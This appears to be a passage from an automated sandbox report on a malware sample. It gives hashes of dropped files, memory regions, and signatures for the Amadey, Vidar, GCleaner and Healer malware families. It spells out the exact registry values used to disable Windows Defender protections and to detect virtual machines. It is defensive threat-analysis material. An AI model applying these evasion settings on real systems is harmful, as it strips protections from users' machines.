SHA512 e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c

memory/2940-61-0x000000013FF20000-0x00000001403DB000-memory.dmp

memory/1740-62-0x00000000011E0000-0x0000000001290000-memory.dmp

memory/2820-78-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-73-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-71-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-69-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-67-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-65-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-76-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-75-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2716-82-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-83-0x0000000000C50000-0x0000000001119000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

MD5 87da0483aefde76a5086c5b2ea14304f
SHA1 ae6b27aeaf487666c71b26397709004e65b09002
SHA256 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f
SHA512 ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4

memory/2996-98-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2716-97-0x0000000006AB0000-0x0000000006F1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab36BC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar36CE.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 85161b67da1a3df1f9d35b48d05dfcd1
SHA1 c61740cf82fa55a77f3d2fe8f0fc7cb1fa9d0ddf
SHA256 d97f42f4b1dbdaf9afdded0834b6aa07d795f4f38827c07faa5503f1873059b7
SHA512 78b7f5e8f462b2e49de2338c0f29238a99c785286f230dc8176b89d2f78916b2a42aa497c0d42a0d047ea404e6bff0ba50ee8dabb8fb9ffc38bfc64ae7e21f4f

C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe

MD5 5b0bf9144e2661027c1621957b1ef278
SHA1 589efc0736ecc18d94e4dd8d353502e8d76738c4
SHA256 a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f
SHA512 e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177

C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta

MD5 6a3a2756387d1c8e5ec150c2f910e488
SHA1 be8a023493cfce056e8cfd884498984c26be48bd
SHA256 60b7dc972da88caf9e242c773088e1df29aa3d9fa2f52049c2cf1441aad6363a
SHA512 9778be38d5e30700fc56cf6092972fe8a19b024ab81078924055c1cbf662acc7f003cb2253788ec67f022ff33d0fd66aead8c75f8125e5f830cc989fae470659

C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/1756-260-0x0000000006440000-0x0000000006892000-memory.dmp

memory/2944-259-0x0000000000900000-0x0000000000D52000-memory.dmp

memory/1756-258-0x0000000006440000-0x0000000006892000-memory.dmp

memory/2716-257-0x0000000006AB0000-0x0000000006F1A000-memory.dmp

memory/2944-280-0x0000000000900000-0x0000000000D52000-memory.dmp

memory/2944-279-0x0000000000900000-0x0000000000D52000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\30SMFKX3Q831TJGZG868.temp

MD5 54200432a451e4fa263abc6274ceeb41
SHA1 f65f6532098388e91c209baec0ceccf9e6d36808
SHA256 18ab5c4567b7f0a1b0e658a30139ccdc2cbc7d2b2376cc4837b435d0520de293
SHA512 addc696c78ee97b088ebcbaaf2ebfbb7994198856959b175de25f042d1de89f7e01b431a9e80f1cc878272292c78f114e5c6dd56401b0647915cb005ffd2c661

memory/2996-307-0x0000000000400000-0x000000000086A000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Temp\hWO8LyeS1.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

memory/2716-324-0x0000000000C50000-0x0000000001119000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

memory/2996-361-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

MD5 41e7a544f14c8eeda7675b6f8fc2f267
SHA1 98585d0462f44ace4216e00c0ae33f7b3606e0d4
SHA256 b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843
SHA512 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef

memory/2716-428-0x0000000006AB0000-0x0000000006DDE000-memory.dmp

memory/1644-429-0x0000000000920000-0x0000000000C4E000-memory.dmp

memory/2716-427-0x0000000006AB0000-0x0000000006DDE000-memory.dmp

\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 d433e1dc943e6ea29d67cf72d2f6fecd
SHA1 9964aa3e596d93673c4d84695dc94d6f1a9766cd
SHA256 a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5
SHA512 caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43

memory/628-467-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1644-465-0x0000000000920000-0x0000000000C4E000-memory.dmp

memory/2056-478-0x00000000010C0000-0x00000000013E0000-memory.dmp

memory/2780-451-0x0000000006570000-0x0000000006890000-memory.dmp

memory/2056-450-0x00000000010C0000-0x00000000013E0000-memory.dmp

memory/2780-449-0x0000000006570000-0x0000000006890000-memory.dmp

memory/2944-502-0x0000000000900000-0x0000000000D52000-memory.dmp

memory/2716-545-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2996-567-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2716-589-0x0000000006AB0000-0x0000000006DDE000-memory.dmp

memory/2716-588-0x0000000006AB0000-0x0000000006DDE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

MD5 49a690607e1d76e6970b724c4fd22ec7
SHA1 4b670fc77c181e9afb3986729ee3b585bc460c3f
SHA256 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7
SHA512 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b

memory/2912-625-0x0000000000A10000-0x0000000000D0F000-memory.dmp

memory/2716-626-0x0000000006AB0000-0x0000000006DAF000-memory.dmp

memory/2716-624-0x0000000006AB0000-0x0000000006DAF000-memory.dmp

memory/2912-651-0x0000000000A10000-0x0000000000D0F000-memory.dmp

memory/628-650-0x0000000000FF0000-0x000000000131E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091742001\022606d6b2.exe

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

MD5 03b33bee015493080376b643025fdf86
SHA1 bdadfa2adfc6d9c5413bcb2ac1d3b1918fb95bfd
SHA256 4acb822963132fd6bce9c8a61b8aa3d5015aadfd268717c1bf1c84ed3a8c809b
SHA512 6e758f621d5fd1d041e926b6bd607e670329def72e8b9ffb940e28a7ed77212f8e6a6eabf7d15e912ae842a990ebf6fc65779f64307fb86993fcd97790eeccf9

memory/628-702-0x0000000000FF0000-0x000000000131E000-memory.dmp

\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

MD5 9d6f03d5a83f9ab0de52c69257720122
SHA1 407ce825de553f856059543cb20c2002f4b2b87d
SHA256 ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6
SHA512 d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db

memory/628-714-0x0000000006B50000-0x0000000006FB0000-memory.dmp

memory/1804-713-0x0000000000400000-0x0000000000860000-memory.dmp

memory/628-712-0x0000000006B50000-0x0000000006FB0000-memory.dmp

memory/2716-719-0x0000000006AB0000-0x0000000006DAF000-memory.dmp

memory/2716-718-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2996-720-0x0000000000400000-0x000000000086A000-memory.dmp

memory/628-721-0x0000000006B50000-0x0000000006FB0000-memory.dmp

memory/1804-723-0x0000000000400000-0x0000000000860000-memory.dmp

memory/628-722-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1804-724-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-743-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2996-744-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2996-784-0x0000000000400000-0x000000000086A000-memory.dmp

memory/628-785-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1804-786-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2708-790-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-789-0x0000000000C50000-0x0000000001119000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 5c7477b9c5f004c96d905ca251c16b58
SHA1 a1d57d7f2e0dcc6140d6d7a79ad0da59c544c11e
SHA256 85739875bdfaddd24be15a1046457e17cac757441804c627214973e8456a4b8e
SHA512 fa91684c3360c99a24875f2e29f566fea2b2743f749a4c6e4ca6942b967b7dd37013646359f4083affc004b3db915756b7a166f22628397eeb4fec98e8ee2753

memory/628-792-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1804-793-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2708-796-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2708-795-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-794-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/628-797-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/1804-798-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-799-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2708-800-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe

MD5 cf6bd1302ab35c1275fedadbabde12fa
SHA1 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1
SHA256 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7
SHA512 c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04

memory/628-815-0x0000000000FF0000-0x000000000131E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe

MD5 639af76cb7333cbd609da5d52a6e195b
SHA1 a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483
SHA256 a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8
SHA512 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51

memory/1804-829-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2716-830-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2708-831-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2880-832-0x00000000009C0000-0x0000000001604000-memory.dmp

memory/2264-833-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2264-835-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2880-834-0x00000000009C0000-0x0000000001604000-memory.dmp

memory/2264-839-0x0000000010000000-0x000000001001C000-memory.dmp

memory/628-844-0x0000000000FF0000-0x000000000131E000-memory.dmp

memory/2652-845-0x0000000000E10000-0x0000000001848000-memory.dmp

memory/1548-848-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2652-847-0x0000000000E10000-0x0000000001848000-memory.dmp

memory/1804-850-0x0000000000400000-0x0000000000860000-memory.dmp

memory/1804-851-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\success[2].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2716-853-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2708-854-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe

MD5 db3632ef37d9e27dfa2fd76f320540ca
SHA1 f894b26a6910e1eb53b1891c651754a2b28ddd86
SHA256 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
SHA512 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe

MD5 f071beebff0bcff843395dc61a8d53c8
SHA1 82444a2bba58b07cb8e74a28b4b0f715500749b2
SHA256 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA512 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

memory/2468-915-0x0000000001320000-0x00000000013D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe

MD5 69de9fb1f2c4da9f83d1e076bc539e4f
SHA1 22ce94c12e53a16766adf3d5be90a62790009896
SHA256 0df459c85df5ee90a32edcecd4c0519c00fcf9315b9a24edc132d8cf0f6c7ef8
SHA512 e9f2da39ecbb583943ae618097469e5d82953712b6cfdfa4b58fa4dcc2f683a7049aca4141b897ff1f6ab94d7bbaf21c7dec2e243c8632d46a55e15c363a9733

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-24 13:38

Reported

2025-02-24 13:41

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
